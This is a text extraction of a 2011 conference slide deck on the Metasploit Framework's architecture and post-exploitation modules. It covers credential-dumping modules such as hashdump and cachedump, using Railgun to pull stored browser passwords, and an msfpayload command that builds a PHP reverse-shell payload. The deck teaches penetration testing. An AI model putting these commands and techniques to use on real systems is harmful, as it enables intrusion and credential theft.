deep dive into red teaming with the it framework

8/7/2019 Deep Dive Into Red Teaming With the it Framework

1/28

Deep Dive into Red Teamingwith the Metasploit Framework

1

James egyp7 Lee March 22, 2011


2/28

Outline

Metasploit Framework architecture What are Metasploit modules?

Post-exploitation modules

Building other types of payloads

Platform-agnostic payloads

New Metasploit Express/Pro features

Live Demo

This presentation is for advancedMetasploit Framework users !

2


3/28

Metasploit Project founded in 2003 Open Source penetration testing platform based with over

1 million downloads in the past year

Acquired by Rapid7 in 2009

HD Moore joined Rapid7 as Chief Security Office and Chief Architect of Metasploit

Rapid7 remains committed to the Community

Metasploit Framework is the foundation for thecommercial editions Metasploit Express and MetasploitPro

Metasploit overview

3


4/28

LIBRARIES

MODULES

INTERFACES

Rex

MSF Core

MSF Base

Payload Encoder NOP Auxiliary

Console

CLI

PLUGINS

TOOLS

RPC

Exploit

GUI &Armitage

Metasploit Framework architecture

4


5/28

LIBRARIES

MODULES

INTERFACES

Rex

MSF Core

MSF Base


Console

CLI

PLUGINS

TOOLS

RPC

Exploit

GUI &Armitage


5


6/28

What are Metasploit modules?

More than just exploits Payloads the arbitrary code you hear about in

advisories

Encoders add entropy to payloads, remove bad

characters NOP create sophisticated nopsleds

Auxiliary Like an exploit module but without a payload Underappreciated

6


7/28

LIBRARIES

MODULES

INTERFACES

Rex

MSF Core

MSF Base


Console

CLI

PLUGINS

TOOLS

RPC

Exploit

GUI &Armitage


7

Post


8/28

Back in the day

Best post-exploitation option was irb Still staggeringly useful but hard to automate

Enter: Meterpreter scripts

8


9/28

Meterpreter scripts

Good

Re-read before every run Easier development

Simple interface Anything Ruby can do

Access to the frameworkand the session

Not so good

No structure

No meta data

No generic compatibilitychecks

Ad-hoc options

Only work on Meterpreter

Not easy to reuse code


10/28

New hotness: post-exploitation modules

Newest and least-explored module type Great place to start contributing to the framework

Intended to replace Meterpreter scripts Should retain good aspects

Improve the not-so-good aspects

Post

10


11/28

Keeping the good

Always reloaded when run from meterpreter> Can use reload and rerun commands in msf>

Simple Interface

Anything Ruby can do

Access to the Framework and the session Actually easier than scripts

11


12/28

Improving the not-so-good

Structured like other module types Improves consistency Includes metadata like author, description, etc.

Option setting consistent with other modules

set VAR value mixins for some common tasks, more on the way

File system manipulation Registry twiddling Running commands

12


13/28

Using post-exploitation modules

Like exploits, can be Active or Passive Like aux, add run command, exploit is an alias Take a session option

Define what kinds of sessions are compatible Meterpreter, shell Different platforms

13


14/28

Three ways to run them

Directly from meterpreter> with run command run post/windows/gather/resolve_sid SID=S-1-5-1

Via normal module interface use post/windows/gather/resolve_sid set SID S-1-5-1 run

As an AutoRunScript use exploit/some/module set AutoRunScript

post/windows/gather/resolve_sid SID=S-1-5-1 exploit

14


15/28

Railgun

Not new exactly, but undergoing some majorimprovements

Arbitrary Ruby -> remote Windows API bridge

Call any function in any DLL on the system

Use an applications own API against it Chrome/Firefox stored passwords Many potential uses here

15


16/28

Loot

Pilfered data Can be anything, stored in a file

Process listing Environment variables

Usually not passwords (use Creds table for that)

16


17/28

Awesome Post Modules

Hashdump Similar in function to the hashdump command

Instead of injecting into lsass, just reads the registry Calculates everything necessary to pull hashes directly out of SAM

Theres an OSX version now! Reads /var/db/shadow/hash/ Grabs SHA1, NT, and LM hashes

17


18/28

Third-party post-exploitation modules

Cachedump from Maurizio Agazzini Like hashdump , but grabs cached credentials mscash format for easy cracking (cant be used with pass -the-

hash) Gets credentials from terminal services/rdp users Will eventually be merged into trunk but serves as an example of

adding your own stuff

18


19/28

Modules in the works

Something for going from shell -> Meterpreter And from Java/PHP -> native Meterpreter

Local exploits! Already have modules for four windows privilege escalations

And a generic service auditor Also planning to implement Linux local exploits for shell sessions

Porting scripts to the module format

19


20/28

Where to put it

Official modules live in msf3/modules/ Subdirectories organized by module type ( exploit/,

auxiliary/, post/, )

~/.msf3/modules/ has same structure, loaded atstartup if it exists

20


21/28

Platform-agnostic payloads


22/28


23/28

PHP

msfpayload php/meterpreter_reverse_tcpLHOST=192.168.99.1 R > foo.php

23


24/28

Commercial Feature Highlights

Pro console! All of theabove and more is easilyaccessible in

Metasploit ProConsole

24


25/28


Post-exploitationModules inMetasploit

Pro/Express

25


26/28


Host tags are Awesome

26


27/28


28/28

Questions?

@egyp7

[email protected]

James egyp7 Lee

deep dive into red teaming with the it framework

Documents